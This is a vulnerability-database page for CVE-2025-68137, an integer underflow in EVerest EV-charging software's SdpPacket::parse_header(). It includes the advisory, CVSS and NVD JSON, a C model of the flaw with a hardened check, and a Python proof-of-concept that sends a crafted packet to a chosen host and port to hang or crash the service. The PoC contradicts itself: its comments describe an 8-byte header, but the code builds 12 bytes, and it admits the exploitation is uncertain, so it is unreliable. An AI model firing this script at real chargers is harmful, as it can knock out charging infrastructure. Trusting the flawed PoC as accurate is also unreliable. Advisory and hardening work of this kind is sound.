Security Vulnerability Report
CVE-2025-68137 CVSS 8.3 HIGH

CVE-2025-68137

Published: 2026-01-21 20:16:06
Last Modified: 2026-02-06 21:21:53

Description

EVerest is an EV charging software stack. Prior to version 2025.10.0, an integer overflow occurring in `SdpPacket::parse_header()` allows the current buffer length to be set to 7 after a complete header of size 8 has been read. The remaining length to read is computed as the current length minus the header length, which yields a negative value. That value is then interpreted as `SIZE_MAX` (or slightly less) because the expected type of the argument is `size_t`. Depending on whether the server is plain TCP or TLS, this leads to either an infinite loop or a stack buffer overflow. Version 2025.10.0 fixes the issue.
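The arithmetic the description names, modelled in C as an added example (this is not EVerest's code): `remaining_unchecked` reproduces how the 7 - 8 result turns into `SIZE_MAX` once it reaches a `size_t` parameter, and `remaining_checked` is one hardened form that rejects the state before subtracting. The function names, the `int` intermediate and the 1024-byte receive capacity are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SDP_HEADER_LEN 8u   /* header size named in the advisory */

/* Model of the flawed computation described in the advisory: the signed
 * difference current_len - header_len (7 - 8 = -1) is handed to a size_t
 * parameter and so becomes SIZE_MAX. Reconstruction for illustration
 * (assumed shape), not EVerest's code. */
size_t remaining_unchecked(size_t current_len, size_t header_len) {
    int remaining = (int)current_len - (int)header_len;
    return (size_t)remaining;  /* -1 converts to SIZE_MAX */
}

/* Hardened variant: refuse any state in which fewer bytes than a full header
 * are buffered, and never hand back a length that exceeds the receive buffer.
 * Returning false lets the caller drop the connection instead of looping on a
 * plain-TCP socket or copying SIZE_MAX bytes into a stack buffer under TLS. */
bool remaining_checked(size_t current_len, size_t header_len, size_t capacity,
                       size_t *remaining) {
    if (header_len > capacity) return false;     /* misconfigured caller */
    if (current_len < header_len) return false;  /* subtraction would underflow */
    if (current_len > capacity) return false;    /* already past the buffer */
    *remaining = current_len - header_len;       /* safe: no wrap possible */
    return true;
}

int main(void) {
    size_t rem = 0;
    printf("unchecked 7 - 8 -> %zu (SIZE_MAX is %zu)\n",
           remaining_unchecked(7, SDP_HEADER_LEN), (size_t)SIZE_MAX);
    printf("checked 7 - 8 accepted? %s\n",
           remaining_checked(7, SDP_HEADER_LEN, 1024, &rem) ? "yes" : "no");
    printf("checked 8 - 8 accepted? %s (remaining %zu)\n",
           remaining_checked(8, SDP_HEADER_LEN, 1024, &rem) ? "yes" : "no", rem);
    return 0;
}
```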

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:* - VULNERABLE
EVerest < 2025.10.0
everest-core < 2025.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-68137 PoC - EVerest SdpPacket::parse_header() Integer Underflow

This PoC demonstrates the integer underflow in SdpPacket::parse_header()
that leads to SIZE_MAX being used as buffer length.
"""
import socket
import struct


def create_malicious_sdp_packet():
    """
    Craft a malicious SDP packet that triggers the integer underflow.
    The header indicates 8 bytes total (complete header), but the internal
    buffer length is set to 7, causing remaining_length = 7 - 8 = -1
    which becomes SIZE_MAX when interpreted as size_t.
    """
    # SDP packet header structure (8 bytes)
    # The key is that header_length == current_buffer_length
    # which causes the underflow: remaining = 7 - 8 = -1 -> SIZE_MAX
    packet = bytearray()
    # Version and message type (1 byte)
    packet.append(0x01)  # SDP version 1
    # Message type: 0x01 = HELLO, 0x02 = HELLO_V2, etc.
    packet.append(0x01)  # HELLO message type
    # Flags (2 bytes) - some implementations use this
    packet.extend(struct.pack('>H', 0x0000))
    # Sequence number (4 bytes)
    packet.extend(struct.pack('>I', 0x00000001))
    # Payload length (4 bytes) - set to 0 to trigger the condition
    packet.extend(struct.pack('>I', 0x00000000))
    # Padding or additional header bytes to reach exactly 8 bytes
    # This ensures header_length = 8, but internal buffer = 7
    # The exact exploitation depends on implementation details
    return bytes(packet)


def send_exploit(target_host, target_port):
    """Send the exploit payload to the target EVerest service."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        payload = create_malicious_sdp_packet()
        print(f"[*] Sending payload ({len(payload)} bytes)...")
        sock.send(payload)
        print("[*] Payload sent. Waiting for response...")
        # If vulnerable, server will hang (DoS) or crash (overflow)
        response = sock.recv(1024)
        print(f"[+] Received: {response.hex()}")
        sock.close()
        return True
    except socket.timeout:
        print("[-] Connection timed out - possible DoS condition (infinite loop)")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_host> <target_port>")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2])
    print("[*] CVE-2025-68137 PoC for EVerest")
    print(f"[*] Target: {target}:{port}")
    send_exploit(target, port)

References

https://github.com/EVerest/everest-core/security/advisories/GHSA-7qq4-q9r8-wc7w (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-68137",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-21T20:16:05.840",
    "lastModified": "2026-02-06T21:21:52.920",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2025.10.0, an integer overflow occurring in `SdpPacket::parse_header()` allows the current buffer length to be set to 7 after a complete header of size 8 has been read. The remaining length to read is computed using the current length subtracted by the header length which results in a negative value. This value is then interpreted as `SIZE_MAX` (or slightly less) because the expected type of the argument is `size_t`. Depending on whether the server is plain TCP or TLS, this leads to either an infinite loop or a stack buffer overflow. Version 2025.10.0 fixes the issue."},
      {"lang": "es", "value": "EVerest es una pila de software de carga de vehículos eléctricos. Antes de la versión 2025.10.0, un desbordamiento de entero que ocurre en 'SdpPacket::parse_header()' permite que la longitud actual del búfer se establezca en 7 después de que se haya leído un encabezado completo de tamaño 8. La longitud restante a leer se calcula utilizando la longitud actual restada de la longitud del encabezado, lo que resulta en un valor negativo. Este valor se interpreta entonces como 'SIZE_MAX' (o ligeramente menos) porque el tipo esperado del argumento es 'size_t'. Dependiendo de si el servidor es TCP plano o TLS, esto conduce a un bucle infinito o a un desbordamiento de búfer de pila. La versión 2025.10.0 corrige el problema."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-120"},
          {"lang": "en", "value": "CWE-835"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2025.10.0",
                "matchCriteriaId": "94E1768A-FED9-477E-A4B7-99FD10058D23"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-7qq4-q9r8-wc7w",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}